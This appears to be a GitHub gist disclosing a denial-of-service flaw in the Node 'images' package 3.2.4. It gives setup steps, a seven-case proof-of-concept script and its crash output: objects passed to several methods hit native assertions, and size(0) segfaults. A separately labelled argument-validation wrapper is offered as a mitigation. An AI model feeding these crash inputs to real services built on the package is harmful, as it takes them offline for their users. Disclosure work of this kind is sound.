@dellalibera
Created January 15, 2024 09:17
Denial of Service (DoS) in images@v3.2.4

Information

Package: images

Tested Version: 3.2.4

GitHub Repository: https://github.com/zhangyuanwei/node-images

Vulnerability: Denial of Service (DoS)

Details

Passing an unexpected input type (such as an object) to several different functions (see the PoC and its output) reaches an assert macro, which crashes the process.

In addition, passing certain integer values (such as 0) to the size function causes a segmentation fault, which also crashes the process.

Vulnerable code (multiple places):

Setup

Tested on:

Ubuntu 22.04.3 LTS
Node v18.19.0
  • Download an image (I took one from the same repo):
    wget https://raw.githubusercontent.com/zhangyuanwei/node-images/master/test/input.png
  • Install the package:
    npm i images
  • If running poc.js fails with the error "node: symbol lookup error:", follow the instructions at https://github.com/zhangyuanwei/node-images/issues/260, i.e. download the zip file from that thread and unzip it into the ./vendor folder:
    wget https://github.com/zhangyuanwei/node-images/files/12840099/linux-x64-binding.node.zip
    unzip linux-x64-binding.node.zip -d ./node_modules/images/vendor/

PoC

Usage

    node poc.js <poc1|poc2|poc3|poc4|poc5|poc6|poc7>
  • poc1
    node poc.js poc1
    Running poc1
    node: ../src/Image.cc:281: static napi_value__* Image::New(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
    Aborted (core dumped)
  • poc2
    node poc.js poc2
    Running poc2
    node: ../src/Image.cc:333: static napi_value__* Image::SetWidth(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
    Aborted (core dumped)
  • poc3
    node poc.js poc3
    Running poc3
    node: ../src/Image.cc:372: static napi_value__* Image::SetHeight(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
    Aborted (core dumped)
  • poc4
    node poc.js poc4
    Running poc4
    node: ../src/Image.cc:398: static napi_value__* Image::Resize(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
    Aborted (core dumped)
  • poc5
    node poc.js poc5
    Running poc5
    node: ../src/Image.cc:442: static napi_value__* Image::Rotate(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
    Aborted (core dumped)
  • poc6
    node poc.js poc6
    Running poc6
    node: ../src/Image.cc:486: static napi_value__* Image::FillColor(napi_env, napi_callback_info): Assertion `status == napi_ok' failed.
    Aborted (core dumped)
  • poc7
    node poc.js poc7
    Running poc7
    Segmentation fault (core dumped)

Impact

Denial of Service (DoS)
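
One way for a caller to keep untrusted values away from the native assertions is to validate arguments in JavaScript before the call, since a try/catch cannot intercept the abort. The following is an added example, not code from the gist or from the node-images project; `guard`, `guardedOpen` and the argument rules are assumptions derived from the calls shown in the PoC.

```javascript
// Added example: argument checks in front of the native binding. Rules are
// assumptions from the PoC: numbers only, positive integers for dimensions.
function isPositiveInt(v) {
  return Number.isInteger(v) && v > 0;
}

const RULES = {
  width: isPositiveInt,
  height: isPositiveInt,
  size: isPositiveInt,
  resize: isPositiveInt,
  rotate: Number.isFinite,
  fill: Number.isFinite,
};

// Throws a catchable TypeError instead of letting the value reach an assert().
function checkArgs(method, args) {
  const rule = RULES[method];
  if (!rule) return; // method not exercised by the PoC: pass through
  args.forEach((arg, i) => {
    if (!rule(arg)) {
      throw new TypeError(`${method}(): rejected ${typeof arg} argument at index ${i}`);
    }
  });
}

// Wraps an image object so every listed method is validated before the call.
function guard(img) {
  const proxy = new Proxy(img, {
    get(target, prop) {
      const value = target[prop];
      if (typeof value !== 'function') return value;
      return (...args) => {
        checkArgs(prop, args);
        const result = value.apply(target, args);
        return result === target ? proxy : result; // keep chained calls guarded
      };
    },
  });
  return proxy;
}

// `open` is the package's exported function; only path strings or Buffers pass (assumption).
function guardedOpen(open, source) {
  if (typeof source !== 'string' && !Buffer.isBuffer(source)) {
    throw new TypeError(`images(): rejected ${typeof source} source`);
  }
  return guard(open(source));
}
```

Called as `guardedOpen(require('images'), './input.png').size(0)`, the check raises a TypeError that an ordinary try/catch can handle.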

Author

Alessio Della Libera

const images = require('images');

const input_image = './input.png';
// Unexpected argument type passed to each function under test
const input = {};

// Constructor called with an object
function poc1() {
  console.log('Running poc1');
  images(input);
}

// width() called with an object
function poc2() {
  console.log('Running poc2');
  images(input_image).width(input);
}

// height() called with an object
function poc3() {
  console.log('Running poc3');
  images(input_image).height(input);
}

// resize() called with an object
function poc4() {
  console.log('Running poc4');
  images(input_image).resize(input);
}

// rotate() called with an object
function poc5() {
  console.log('Running poc5');
  images(input_image).rotate(input);
}

// fill() called with an object
function poc6() {
  console.log('Running poc6');
  images(input_image).fill(input);
}

// size() called with 0 (segmentation fault)
function poc7() {
  console.log('Running poc7');
  images(input_image).size(0);
}

const pocs = new Map();
pocs.set('poc1', poc1);
pocs.set('poc2', poc2);
pocs.set('poc3', poc3);
pocs.set('poc4', poc4);
pocs.set('poc5', poc5);
pocs.set('poc6', poc6);
pocs.set('poc7', poc7);

function run() {
  const args = process.argv.slice(2);
  const p = args[0];
  // Fall back to poc1 when no (or an unknown) name is given
  const poc = pocs.get(p) || poc1;

  // The process dies inside the native call, so neither message below is printed
  try {
    poc();
  } catch (e) {
    console.log('Never executed');
    console.log(e);
  }
  console.log('Never executed');
}

run();